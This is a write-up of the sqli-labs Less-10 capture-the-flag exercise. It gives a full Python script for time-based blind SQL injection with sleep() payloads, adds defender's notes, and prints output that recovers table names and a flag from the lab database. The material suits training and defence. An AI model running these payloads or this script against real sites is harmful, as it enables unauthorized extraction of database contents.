less-10 in sqli-labs
阿新 • • 發佈:2020-12-17
Less-10 延遲注入[ ” ]
先進行注入點的測試,發現試過很多 payload 回顯都是一樣的;當嘗試到 ?id=1" and sleep(5) --+ 時,發現頁面在延遲後才有回顯,猜測是基於 " 的時間盲注。盲注腳本和 less-9 基本一樣,改下 url 就行。
解題指令碼
# less-9 url = "http://sqli-labs:8080/Less-9/?id=1' "
# less-10 url = "http://sqli-labs:8080/Less-10/?id=1\" "  (the active value is the `url` assignment below)
"""Time-based blind SQL injection walkthrough for sqli-labs Less-10 (double-quote string context).

Every probe appends ``and if(<condition>,sleep(2),1) --+`` to the ``id`` parameter and
times the round trip with ``datetime.datetime.now()``.  ``.seconds`` on the difference is
an integer, so the ``> 1`` test only fires when the whole request took at least two
seconds of wall-clock time; the response body is never read.  Values are recovered one
fact per request: lengths and counts by trying ``1 .. MAXLENGTH-1``, characters by trying
every printable ASCII code ``32 .. 126``.

Defender's notes: on the server side this shows up as a burst of hundreds of requests to
one endpoint whose query strings contain ``sleep(`` / ``if(``, paired with a matching spike
in database response time (slow-query log).  The root cause is the unparameterised ``id``
lookup in the lab page; a prepared statement removes the whole class of probe.
"""
import requests
import time  # NOTE(review): imported but never used; all timing is done with datetime below
import datetime

MAXLENGTH = 20  # exclusive upper bound for every length / count search below
url = "http://sqli-labs:8080/Less-10/?id=1\" "  # lab target; the escaped quote is the string closer the page identified, the space separates the payload


def getLengthOfDatabase():
    """Return the length of ``database()`` by probing 1..MAXLENGTH-1.

    Falls off the loop and returns ``None`` if no candidate triggers the delay;
    ``__main__`` then hands that ``None`` straight to getNameOfDatabase.
    """
    for num in range(1,MAXLENGTH):
        payload = "and if(length(database())=%s,sleep(2),1) --+"
        first_time = datetime.datetime.now()  # wall-clock time just before the probe is sent
        res = requests.get(url + payload % num)  # body is never inspected; only the elapsed time matters
        second_time = datetime.datetime.now()  # wall-clock time once the response is back
        diference_time = (second_time - first_time).seconds  # whole seconds elapsed (fractions truncated)
        if diference_time > 1:
            print("[+] 資料庫的長度為 => {}".format(num))
            return num


def getNameOfDatabase(DATABASELENGTH: int) -> str:
    """Recover ``database()`` character by character over positions 1..DATABASELENGTH.

    Each hit appends ``chr(j)`` and reprints the partial name, which is why the sample
    output shows ``s``, ``se``, ``sec`` ... one line at a time.
    NOTE(review): there is no ``break`` after a hit, so the remaining codes for that
    position are still probed; a second (spurious, latency-induced) hit would append
    an extra character.
    """
    database_name = ""
    for i in range(1,DATABASELENGTH+1):
        for j in range(32,127):  # printable ASCII 32..126
            payload = "and if(ascii(substr(database(),%s,1))=%s,sleep(2),1) --+"
            first_time = datetime.datetime.now()
            res = requests.get(url + payload % (i,j))
            second_time = datetime.datetime.now()
            difference_time = (second_time - first_time).seconds
            if difference_time > 1:
                database_name += chr(j)
                print("[+] 資料庫名為 => " + database_name)
    return database_name


def getNumberOfTables():
    """Return how many tables the current schema has (probes 1..MAXLENGTH-1).

    Returns ``None`` if no candidate count triggers the delay.
    """
    for num in range(1,MAXLENGTH):
        payload = "and if((select count(*) from information_schema.tables where table_schema=database())=%s,sleep(2),1) --+"
        first_time = datetime.datetime.now()
        res = requests.get(url + payload % num)
        second_time = datetime.datetime.now()
        difference_time = (second_time - first_time).seconds
        if difference_time > 1:
            print("[+] 資料庫中表的數量為 => {}".format(num))
            return num


def getLengthOfAllTables(NUMBEROFTABLES: int) -> list[int]:
    """Return the name length of each table, indexed by ``limit i,1`` offset.

    The per-table line prints the 0-based offset ``i`` (getNameOfAllTables prints ``i+1``),
    which is why the sample output counts tables from 0 here and from 1 there.
    NOTE(review): no ``break`` after a hit, so every remaining length is still probed
    for that table, and a second hit would push an extra entry onto the list and shift
    the index alignment used by getNameOfAllTables.
    """
    lengthofalltables_list = []
    for i in range(NUMBEROFTABLES):
        for num in range(1,MAXLENGTH):
            payload = "and if(length((select table_name from information_schema.tables where table_schema=database() limit %s,1))=%s,sleep(2),1) --+"
            first_time = datetime.datetime.now()
            res = requests.get(url + payload % (i,num))
            second_time = datetime.datetime.now()
            difference_time = (second_time - first_time).seconds
            if difference_time > 1:
                print("[+] 第{}張表的長度為 => {}".format(i,num))
                lengthofalltables_list.append(num)
    print("[+] 所有表的長度為 => {}".format(lengthofalltables_list))
    return lengthofalltables_list


def getNameOfAllTables(NUMBEROFTABLES: int, LENGTHOFTABLE_LIST: list[int]) -> list[str]:
    """Return every table name in the current schema.

    Table ``i`` is read with ``limit i,1``; its length comes from ``LENGTHOFTABLE_LIST[i]``.
    Unlike the length probes, a hit here ``break``s out of the character loop.
    """
    nameofalltables_list = []
    for i in range(NUMBEROFTABLES):
        name = ""
        for j in range(1,LENGTHOFTABLE_LIST[i]+1):
            for k in range(32,127):
                payload = "and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %s,1),%s,1))=%s,sleep(2),1) --+"
                first_time = datetime.datetime.now()
                res = requests.get(url + payload % (i,j,k))
                second_time = datetime.datetime.now()
                difference_time = (second_time - first_time).seconds
                if difference_time > 1:
                    name = name + chr(k)
                    break  # first matching code wins; move to the next position
        nameofalltables_list.append(name)
        print("[+] 第{}張表的名字為 => {}".format(i+1,name))
    print("[+] 所有表的名字為 => {}".format(nameofalltables_list))
    return nameofalltables_list


def getNumberOfColumns(TABLE_TO_FIND: str):
    """Return the column count of ``TABLE_TO_FIND`` (probes 1..MAXLENGTH-1).

    NOTE(review): unlike the other information_schema queries this one has no
    ``table_schema=database()`` filter, so a same-named table in another schema
    would be counted too.  Returns ``None`` if no candidate triggers the delay.
    """
    for num in range(1,MAXLENGTH):
        payload = "and if((select count(*) from information_schema.columns where table_name='%s')=%s,sleep(2),1) --+"
        first_time = datetime.datetime.now()
        res = requests.get(url + payload % (TABLE_TO_FIND,num))
        second_time = datetime.datetime.now()
        difference_time = (second_time - first_time).seconds
        if difference_time > 1:
            print("[+] {}表中列的數量為 => {}".format(TABLE_TO_FIND,num))
            return num


def getLengthOfAllColmuns(NUMBEROFCOLUMNS: int, TABLE_TO_FIND: str) -> list[int]:
    """Return the name length of each column of ``TABLE_TO_FIND``, by ``limit i,1`` offset.

    (Function name keeps the author's spelling; ``__main__`` calls it by that name.)
    NOTE(review): no ``break`` after a hit, same caveat as getLengthOfAllTables.
    """
    lengthofallcolumns_list = []
    for i in range(NUMBEROFCOLUMNS):
        for num in range(1,MAXLENGTH):
            payload = "and if(length((select column_name from information_schema.columns where table_schema=database() and table_name='%s' limit %s,1))=%s,sleep(2),1) --+"
            first_time = datetime.datetime.now()
            res = requests.get(url + payload % (TABLE_TO_FIND,i,num))
            second_time = datetime.datetime.now()
            difference_time = (second_time - first_time).seconds
            if difference_time > 1:
                lengthofallcolumns_list.append(num)
    print("[+] {}表中列的長度分別為 => {}".format(TABLE_TO_FIND,lengthofallcolumns_list))
    return lengthofallcolumns_list


def getNameOfAllColumns(NUMBEROFTABLES: int, LENGTHOFCOLUMNS_LIST: list[int], TABLE_TO_FIND: str) -> list[str]:
    """Return every column name of ``TABLE_TO_FIND``.

    NOTE(review): the first parameter ``NUMBEROFTABLES`` is never used.  The loop
    bound is ``NUMBEROFCOLUMNS``, a module-level name assigned only inside the
    ``__main__`` block, so this function raises ``NameError`` if imported and
    called from anywhere else.
    """
    nameofallcolumns_list = []
    for i in range(NUMBEROFCOLUMNS):  # module global from __main__, not the parameter
        name = ""
        for j in range(1,LENGTHOFCOLUMNS_LIST[i]+1):
            for k in range(32,127):
                payload = "and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='%s' limit %s,1),%s,1))=%s,sleep(2),1) --+"
                first_time = datetime.datetime.now()
                res = requests.get(url + payload % (TABLE_TO_FIND,i,j,k))
                second_time = datetime.datetime.now()
                difference_time = (second_time - first_time).seconds
                if difference_time > 1:
                    name = name + chr(k)
                    break
        nameofallcolumns_list.append(name)
    print("[+] {}表中列名分別為 => {}".format(TABLE_TO_FIND,nameofallcolumns_list))
    return nameofallcolumns_list


def getData(TABLE_TO_FIND: str, COLUMN_TO_FIND: str) -> int:
    """Read ``select COLUMN_TO_FIND from TABLE_TO_FIND`` one character at a time and print it.

    Returns 1 once a ``}`` is recovered.  The position counter is advanced whether or
    not a character matched, and nothing else leaves the ``while True`` loop, so a value
    that never contains ``}`` (or a non-printable character) keeps the loop running
    indefinitely.
    """
    # start probing at character position 1
    flag_length = 1
    flag = ""
    # one outer iteration per character position, until the closing brace is seen
    while True:
        # every printable ASCII candidate for this position
        for k in range(32,127):
            payload = "and if(ascii(substr((select %s from %s),%s,1))=%s,sleep(2),1) --+"
            first_time = datetime.datetime.now()
            res = requests.get(url + payload % (COLUMN_TO_FIND,TABLE_TO_FIND,flag_length,k))
            second_time = datetime.datetime.now()
            difference_time = (second_time - first_time).seconds
            if difference_time > 1:
                # print the value recovered so far
                flag += chr(k)
                print("[+] " + flag)
                # termination: the closing brace is the last character of the flag
                if chr(k) == "}":
                    print()
                    return 1
                break
        # matched or not, move on to the next position
        flag_length += 1


if __name__ == '__main__':
    print("Judging the length of the database...")
    DATABASELENGTH = getLengthOfDatabase()
    print("Judging the name of the database...")
    DATABASENAME = getNameOfDatabase(DATABASELENGTH)
    print("Judging the number of tables in the {}...".format(DATABASENAME))
    NUMBEROFTABLES = getNumberOfTables()
    print("Judging the length of every table in the {}...".format(DATABASENAME))
    LENGTHOFTABLE_LIST = getLengthOfAllTables(NUMBEROFTABLES)
    print("Judging the name of every table in the {}...".format(DATABASENAME))
    NAMEOFTABLE_LIST = getNameOfAllTables(NUMBEROFTABLES,LENGTHOFTABLE_LIST)
    for i in NAMEOFTABLE_LIST:
        print("[+]{}".format(i))
    TABLE_TO_FIND = input("Select the table name:")
    if TABLE_TO_FIND not in NAMEOFTABLE_LIST:
        print("Error!")
        exit()
    print()
    # the column count is probed (and printed) before the "Judging the number of columns" banner,
    # which is the order the sample output shows
    NUMBEROFCOLUMNS = getNumberOfColumns(TABLE_TO_FIND)
    print("Judging the number of columns in the {}...".format(TABLE_TO_FIND))
    print("Judging the length of every column in the {}...".format(TABLE_TO_FIND))
    LENGTHOFCOLUMNS_LIST = getLengthOfAllColmuns(NUMBEROFCOLUMNS,TABLE_TO_FIND)
    print("Judging the name of every column in the {}...".format(TABLE_TO_FIND))
    NAMEOFCOLUMNS_LIST = getNameOfAllColumns(NUMBEROFTABLES,LENGTHOFCOLUMNS_LIST,TABLE_TO_FIND)
    for i in NAMEOFCOLUMNS_LIST:
        print("[+]{}".format(i))
    COLUMN_TO_FIND = input("Select the column name:")
    # NOTE(review): this re-checks TABLE_TO_FIND, so COLUMN_TO_FIND is never validated
    # against NAMEOFCOLUMNS_LIST before being interpolated into the query
    if TABLE_TO_FIND not in NAMEOFTABLE_LIST:
        print("Error!")
        exit()
    print("Judging the data...")
    print("[+] The flag is...")
    getData(TABLE_TO_FIND,COLUMN_TO_FIND)
輸出
D:\Pycharm\3.9\Scripts\python.exe D:/Pycharm/3.9/SQL注入/time-blind.py Judging the length of the database... [+] 資料庫的長度為 => 8 Judging the name of the database... [+] 資料庫名為 => s [+] 資料庫名為 => se [+] 資料庫名為 => sec [+] 資料庫名為 => secu [+] 資料庫名為 => secur [+] 資料庫名為 => securi [+] 資料庫名為 => securit [+] 資料庫名為 => security Judging the number of tables in the security... [+] 資料庫中表的數量為 => 5 Judging the length of every table in the security... [+] 第0張表的長度為 => 6 [+] 第1張表的長度為 => 10 [+] 第2張表的長度為 => 8 [+] 第3張表的長度為 => 7 [+] 第4張表的長度為 => 5 [+] 所有表的長度為 => [6, 10, 8, 7, 5] Judging the name of every table in the security... [+] 第1張表的名字為 => emails [+] 第2張表的名字為 => hermesflag [+] 第3張表的名字為 => referers [+] 第4張表的名字為 => uagents [+] 第5張表的名字為 => users [+] 所有表的名字為 => ['emails', 'hermesflag', 'referers', 'uagents', 'users'] [+]emails [+]hermesflag [+]referers [+]uagents [+]users Select the table name:hermesflag [+] hermesflag表中列的數量為 => 2 Judging the number of columns in the hermesflag... Judging the length of every column in the hermesflag... [+] hermesflag表中列的長度分別為 => [2, 4] Judging the name of every column in the hermesflag... [+] hermesflag表中列名分別為 => ['Id', 'flag'] [+]Id [+]flag Select the column name:flag Judging the data... [+] The flag is... 
[+] f [+] fl [+] fla [+] flag [+] flag{ [+] flag{3 [+] flag{32 [+] flag{327 [+] flag{327a [+] flag{327a6 [+] flag{327a6c [+] flag{327a6c4 [+] flag{327a6c43 [+] flag{327a6c430 [+] flag{327a6c4304 [+] flag{327a6c4304a [+] flag{327a6c4304ad [+] flag{327a6c4304ad5 [+] flag{327a6c4304ad59 [+] flag{327a6c4304ad593 [+] flag{327a6c4304ad5938 [+] flag{327a6c4304ad5938e [+] flag{327a6c4304ad5938ea [+] flag{327a6c4304ad5938eaf [+] flag{327a6c4304ad5938eaf0 [+] flag{327a6c4304ad5938eaf0e [+] flag{327a6c4304ad5938eaf0ef [+] flag{327a6c4304ad5938eaf0efb [+] flag{327a6c4304ad5938eaf0efb6 [+] flag{327a6c4304ad5938eaf0efb6c [+] flag{327a6c4304ad5938eaf0efb6cc [+] flag{327a6c4304ad5938eaf0efb6cc3 [+] flag{327a6c4304ad5938eaf0efb6cc3e [+] flag{327a6c4304ad5938eaf0efb6cc3e5 [+] flag{327a6c4304ad5938eaf0efb6cc3e53 [+] flag{327a6c4304ad5938eaf0efb6cc3e53d [+] flag{327a6c4304ad5938eaf0efb6cc3e53dc [+] flag{327a6c4304ad5938eaf0efb6cc3e53dc}